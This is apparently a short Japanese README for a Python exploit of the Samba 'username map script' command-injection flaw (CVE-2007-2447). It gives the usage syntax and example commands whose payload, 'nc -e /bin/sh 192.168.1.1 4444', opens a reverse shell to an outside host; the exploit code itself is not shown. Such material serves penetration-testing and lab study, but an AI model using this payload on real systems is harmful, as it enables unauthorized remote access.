
Samba 3.0.20 < 3.0.25rc3 (CVE-2007-2447) 向けの 'Username' map script RCE Exploit の Python 実装。
Samba 3.0.20 < 3.0.25rc3 向けの 'Username' map script の RCE エクスプロイト (CVE-2007-2447) の Python 実装。
python3 smbExploit.py <IP> <PORT> <PAYLOAD>
例:
python3 smbExploit.py 192.168.1.2 139 'nc -e /bin/sh 192.168.1.1 4444'
python3 smbExploit.py 192.168.1.2 'nc -e /bin/sh 192.168.1.1 4444'
CVE-2007-2447: Remote Command Injection Vulnerability
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)